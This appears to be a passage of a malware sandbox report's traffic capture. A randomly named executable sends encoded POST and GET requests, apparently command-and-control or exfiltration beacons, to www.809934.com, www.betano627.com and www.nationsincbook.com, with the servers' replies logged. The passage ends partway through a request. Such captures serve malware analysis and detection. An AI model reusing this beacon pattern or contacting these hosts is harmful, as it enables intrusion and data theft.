61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.749739148.135.97.125806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:27.797679901 CEST723OUTPOST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 6c 47 7a 41 34 51 59 74 6f 35 4d 77 41 75 34 44 6b 41 69 4a 32 79 57 71 66 4f 6c 50 66 59 6a 32 46 67 62 48 72 66 69 70 38 75 47 45 6f 46 7a 51 47 50 6d 42 45 73 64 55 32 77 52 51 37 37 78 50 46 66 36 61 71 59 69 46 48 41 6b 39 31 56 51 47 50 4b 4c 77 57 6c 63 4b 6d 57 47 69 76 64 6d 76 7a 6f 53 31 64 32 2f 33 51 57 58 56 68 6c 56 42 57 59 41 4f 48 47 67 2b 31 61 54 76 54 51 6f 52 54 37 6d 4b 42 46 4a 73 52 73 57 75 79 46 4e 31 6a 6c 77 64 79 6d 42 66 45 6b 6a 68 41 56 4f 2f 73 69 63 6a 76 73 66 74 41 5a 6c 6e 44 64 45 67 64 59 51 4c 44 36 44 33 59 54 6e 46 4f 41 59 66 46 30 62 4e 4c 50 68 54 44 67 52 35 48 50 51 76 59 50 53 66 51 6c 6f 38 45 63 79 51 64 6d 43 58 31 44 33 2b 31 33 41 3d
                                              Data Ascii: 5HE=lGzA4QYto5MwAu4DkAiJ2yWqfOlPfYj2FgbHrfip8uGEoFzQGPmBEsdU2wRQ77xPFf6aqYiFHAk91VQGPKLwWlcKmWGivdmvzoS1d2/3QWXVhlVBWYAOHGg+1aTvTQoRT7mKBFJsRsWuyFN1jlwdymBfEkjhAVO/sicjvsftAZlnDdEgdYQLD6D3YTnFOAYfF0bNLPhTDgR5HPQvYPSfQlo8EcyQdmCX1D3+13A=
                                              Jul 21, 2024 13:33:28.376972914 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.749740148.135.97.125806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:30.329560041 CEST1736OUTPOST /vqsg/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Origin: http://www.809934.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.809934.com/vqsg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 6c 47 7a 41 34 51 59 74 6f 35 4d 77 41 75 34 44 6b 41 69 4a 32 79 57 71 66 4f 6c 50 66 59 6a 32 46 67 62 48 72 66 69 70 38 75 4f 45 76 33 58 51 48 6f 36 42 46 73 64 55 35 67 52 4e 37 37 77 64 46 62 66 53 71 59 76 77 48 46 67 39 31 33 6f 47 62 76 2f 77 59 6c 63 4b 71 32 47 6e 79 4e 6d 41 7a 6f 43 70 64 32 76 33 51 57 58 56 68 6e 4e 42 53 4d 73 4f 55 32 67 78 69 71 54 7a 45 41 6f 35 54 37 2b 61 42 46 39 6a 52 59 61 75 79 6c 64 31 67 58 59 64 35 6d 42 64 46 6b 6a 44 41 56 79 67 73 69 51 76 76 73 44 4c 41 62 31 6e 42 4c 4a 61 41 6f 63 68 65 4b 62 73 59 6c 48 58 42 42 77 52 4e 56 48 77 4d 34 78 79 64 52 46 65 4a 76 73 75 52 4b 7a 44 53 6c 6b 4d 43 38 62 4a 52 43 57 63 6d 42 54 44 30 77 4a 49 55 35 5a 73 68 44 62 4a 30 52 33 78 50 66 4d 47 6d 4b 57 42 35 59 44 37 51 6a 4e 37 32 4f 4a 69 73 64 42 35 58 57 76 4a 49 46 56 7a 35 48 38 30 5a 53 66 4d 62 44 35 4e 6d 4d 2b 78 33 38 36 49 6c 45 64 43 30 6d 71 30 62 6e 36 57 46 68 59 34 4c 39 45 52 67 30 51 6e 67 47 65 49 2f 38 54 73 37 58 56 50 65 4d [TRUNCATED]
                                              Data Ascii: 5HE=lGzA4QYto5MwAu4DkAiJ2yWqfOlPfYj2FgbHrfip8uOEv3XQHo6BFsdU5gRN77wdFbfSqYvwHFg913oGbv/wYlcKq2GnyNmAzoCpd2v3QWXVhnNBSMsOU2gxiqTzEAo5T7+aBF9jRYauyld1gXYd5mBdFkjDAVygsiQvvsDLAb1nBLJaAocheKbsYlHXBBwRNVHwM4xydRFeJvsuRKzDSlkMC8bJRCWcmBTD0wJIU5ZshDbJ0R3xPfMGmKWB5YD7QjN72OJisdB5XWvJIFVz5H80ZSfMbD5NmM+x386IlEdC0mq0bn6WFhY4L9ERg0QngGeI/8Ts7XVPeM0MRphuYVLN4sikS/f04GrX5A0rxj9qsrovkr9luWt6MlZ0Ow+cSrpitwSLbqowT6RkKF/UpHrKaQ3j451Hvuk15qnr4eZ+7jYH6RqMst7YgHJUrT89BP2nPFkPvE1rT+G7Kd4upUwiUJwcK+RbPUnihyotbMeSMawu99O0biiymIe5hVsZez6UjmyFmO4VBMgTjXTVRcLYa8aE3klRM1+uehNRMmF2pfNrSM9nJGd7ySqnWacJ0CrVEH6H1ESJacgpdajGXd7HhKRD8Mk+yl790jsZqfl2kbAHmzB0LLve31E1GOqYlOYkFw26xQIUzROSxmBjxXg7vnEHAQM5zsoEPElkEgmWDhFsJlOpJQYLtbNhAXi9zpZRc5hRKH/J59eBoNW2eaJwRsAVmBp0dtrtZdMBUcrdMbioBrXWXUX/Re7TOGHW8m3/ArAUkctp/4uGoSXQ6w2eh1hI43UqMQD9MPZZR87qAAhDgOLyGtWVvcsg24zR44HcmCTrP61N2/iaUJhi4lK67IqOmyA5x1jD30/PEULpRBaXvKk1Y+KPYx/v/X8ljfPeDxtaYAzvVy7xwHbLOX9Y6Om/OOZn9Vyp6UjMN+ZrvHrhOKjfovIB8Yz6wqAF4XMKc/wCgkGTN1ZUeF8wtJARzniSvHD+7yG1VsNJZ6P7mlxj [TRUNCATED]
                                              Jul 21, 2024 13:33:30.907619953 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.749741148.135.97.125806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:32.859684944 CEST444OUTGET /vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.809934.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:33.452344894 CEST691INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:46:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.7497423.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:38.620356083 CEST712OUTPOST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 66 45 4f 67 76 2b 63 4e 32 52 6e 54 74 41 33 78 4b 72 44 67 56 36 31 70 77 74 78 68 42 41 4a 45 4c 42 4c 39 72 44 5a 31 7a 65 5a 74 67 53 79 6e 49 4b 4e 47 74 71 6d 6d 70 52 50 31 57 46 72 75 39 4e 2f 48 50 4d 4e 54 49 66 57 59 59 50 4b 47 4d 69 54 59 54 30 42 4b 6b 63 6e 47 70 7a 45 4c 32 5a 74 59 7a 45 2b 41 53 48 34 66 51 71 73 2b 6a 33 57 59 68 54 56 72 71 31 77 6b 4f 66 45 39 6a 75 68 6e 50 4d 61 30 4e 4e 35 78 63 4b 64 72 6a 6f 44 79 54 43 6f 45 74 69 35 65 5a 39 63 67 52 4c 66 67 33 6f 62 46 63 4a 58 2f 52 61 61 36 78 34 4c 6e 79 30 68 49 5a 7a 64 73 61 51 56 31 72 74 45 4f 51 5a 75 73 35 51 74 65 41 75 69 66 7a 67 3d 3d
                                              Data Ascii: 5HE=fEOgv+cN2RnTtA3xKrDgV61pwtxhBAJELBL9rDZ1zeZtgSynIKNGtqmmpRP1WFru9N/HPMNTIfWYYPKGMiTYT0BKkcnGpzEL2ZtYzE+ASH4fQqs+j3WYhTVrq1wkOfE9juhnPMa0NN5xcKdrjoDyTCoEti5eZ9cgRLfg3obFcJX/Raa6x4Lny0hIZzdsaQV1rtEOQZus5QteAuifzg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.7497433.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:41.155921936 CEST732OUTPOST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 66 45 4f 67 76 2b 63 4e 32 52 6e 54 72 67 48 78 4d 34 62 67 63 36 31 75 2f 4e 78 68 54 41 49 4e 4c 42 58 39 72 43 63 75 79 73 39 74 68 33 4f 6e 4c 4c 4e 47 71 71 6d 6d 68 78 4f 2f 4a 56 72 68 39 4e 6a 2b 50 4f 70 54 49 66 43 59 59 4b 75 47 4d 78 4c 66 56 6b 42 49 6f 38 6e 45 6b 54 45 4c 32 5a 74 59 7a 45 72 76 53 48 77 66 52 62 38 2b 6a 57 57 62 2f 44 56 71 69 56 77 6b 66 50 45 78 6a 75 68 46 50 4e 48 68 4e 4f 52 78 63 4f 5a 72 6a 35 44 74 5a 43 6f 65 6a 43 34 51 61 49 74 54 59 6f 6e 73 37 36 72 39 53 72 54 70 64 4d 48 59 72 61 48 4c 73 6c 5a 7a 64 78 35 61 4e 32 49 41 70 73 41 57 64 37 61 4e 6d 6e 49 30 4e 38 44 62 6c 54 49 36 53 65 63 30 45 6a 71 63 48 36 55 62 31 4a 6a 59 7a 52 49 3d
                                              Data Ascii: 5HE=fEOgv+cN2RnTrgHxM4bgc61u/NxhTAINLBX9rCcuys9th3OnLLNGqqmmhxO/JVrh9Nj+POpTIfCYYKuGMxLfVkBIo8nEkTEL2ZtYzErvSHwfRb8+jWWb/DVqiVwkfPExjuhFPNHhNORxcOZrj5DtZCoejC4QaItTYons76r9SrTpdMHYraHLslZzdx5aN2IApsAWd7aNmnI0N8DblTI6Sec0EjqcH6Ub1JjYzRI=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.7497443.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:43.689687014 CEST1745OUTPOST /5jc8/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Origin: http://www.betano627.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.betano627.com/5jc8/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 66 45 4f 67 76 2b 63 4e 32 52 6e 54 72 67 48 78 4d 34 62 67 63 36 31 75 2f 4e 78 68 54 41 49 4e 4c 42 58 39 72 43 63 75 79 73 31 74 68 43 43 6e 4a 6f 6c 47 72 71 6d 6d 67 78 4f 79 4a 56 72 38 39 4e 36 32 50 4f 6c 44 49 64 36 59 62 70 57 47 62 30 2f 66 62 6b 42 49 67 63 6e 46 70 7a 45 65 32 59 42 63 7a 45 37 76 53 48 77 66 52 59 55 2b 71 6e 57 62 39 44 56 72 71 31 77 77 4f 66 45 64 6a 75 6f 36 50 4e 54 78 4e 2b 78 78 63 71 39 72 75 72 37 74 62 69 6f 41 6b 43 35 4e 61 49 70 4d 59 6f 36 66 37 36 7a 54 53 72 72 70 59 6f 43 61 34 4f 44 67 75 56 5a 47 56 41 70 57 4f 67 45 78 76 4f 4d 4a 63 4d 36 4c 71 51 63 37 44 50 4c 61 78 6b 59 36 4f 50 67 63 42 53 53 31 55 65 31 45 6d 4a 58 68 67 45 33 63 78 5a 77 48 39 42 58 35 54 48 32 64 37 2b 46 77 66 50 39 49 41 78 6a 4e 54 49 69 68 46 7a 39 31 2f 69 6c 37 71 54 34 33 70 56 73 6b 72 4d 67 34 6e 46 6e 55 37 66 31 61 39 37 32 4a 4b 59 79 6d 47 47 47 31 78 34 53 6f 4e 56 66 61 41 67 78 48 7a 66 2b 66 37 46 55 78 34 42 4f 68 2f 56 70 61 54 58 4c 45 71 4f [TRUNCATED]
                                              Data Ascii: 5HE=fEOgv+cN2RnTrgHxM4bgc61u/NxhTAINLBX9rCcuys1thCCnJolGrqmmgxOyJVr89N62POlDId6YbpWGb0/fbkBIgcnFpzEe2YBczE7vSHwfRYU+qnWb9DVrq1wwOfEdjuo6PNTxN+xxcq9rur7tbioAkC5NaIpMYo6f76zTSrrpYoCa4ODguVZGVApWOgExvOMJcM6LqQc7DPLaxkY6OPgcBSS1Ue1EmJXhgE3cxZwH9BX5TH2d7+FwfP9IAxjNTIihFz91/il7qT43pVskrMg4nFnU7f1a972JKYymGGG1x4SoNVfaAgxHzf+f7FUx4BOh/VpaTXLEqOIJj3FfwFTdt0kFoxMZ9Q9GnSPYWTZV7Nu9KPPehVEIvpwwx9CpjOPJBei9OaS7JI4Su+Cc8MvvS/jTUPjysPw4P0LTjrT42LHLbsjAQ5PqfWUcbCZhiyuWdor/QRCYkK9eozTtEvdBxrA+8HKGPmk62J7SUBeYw2dhaZjVx6PWRma8xs9UTPpBXqE1v4hO8geqaF+I1+Wl7TUphiNSacdGTz4ZUdlneINR1i/+ikptUxc1Jt9eJCwwVRKaej6Hzp3zHb0n7oump4XDfgS6FknMM4jU1teZ61oKCPRtHaqQUx0JkziOiFs1eU0FgWweBk8SR4cTFEaeu6fAj5I8sS13/RzX5SZzr971VaJbR5opb2BBIVIU267WVqDhkJIk7Eu5P3lXIYf7QKqg8kPgaJxCyFyDD/WyyG+74XkGTjyEzocjuHBZaechxZT7KkxlByMUZBp0Mdw+Le0/WI1e1+RhryAgluFreI83lRfFSgt8U+zGdUwMNUpP5LJGZQSeUuvvVXbXKkKu0sFfH384pb4nSr8+xILqH8HMR14t4Rvl3v2+YuW6KNj0Sb9jvfebSIiNNKrQV52EnEq8BO3jWywL1+6qSa0z2bv7Tg1ZuOcTpN0D4rYBnMMIXKWoO+5B7nNckfKu83uABoQd5qaXlr9bKakT9PM2jO5X [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.7497453.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:46.219213963 CEST447OUTGET /5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.betano627.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:33:46.713113070 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:33:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 53 47 6d 41 73 4a 73 32 32 41 58 31 67 68 48 2f 62 4a 79 6a 4a 4f 68 49 33 75 31 71 61 44 46 59 47 78 4b 74 38 32 46 77 31 39 70 4c 6c 48 44 59 42 61 4d 65 6b 62 36 35 70 79 75 6a 4f 6b 53 59 73 37 4c 59 46 72 78 39 42 66 2f 48 50 36 2f 6e 62 42 6a 6b 65 55 35 33 68 75 48 4f 73 7a 41 41 78 66 78 44 72 47 65 35 5a 6c 6b 34 57 35 59 44 67 42 61 4a 38 7a 41 62 6e 31 63 2f 53 76 77 41 30 76 52 5a 45 50 62 53 42 4a 67 72 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.7497463.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:51.806200027 CEST727OUTPOST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
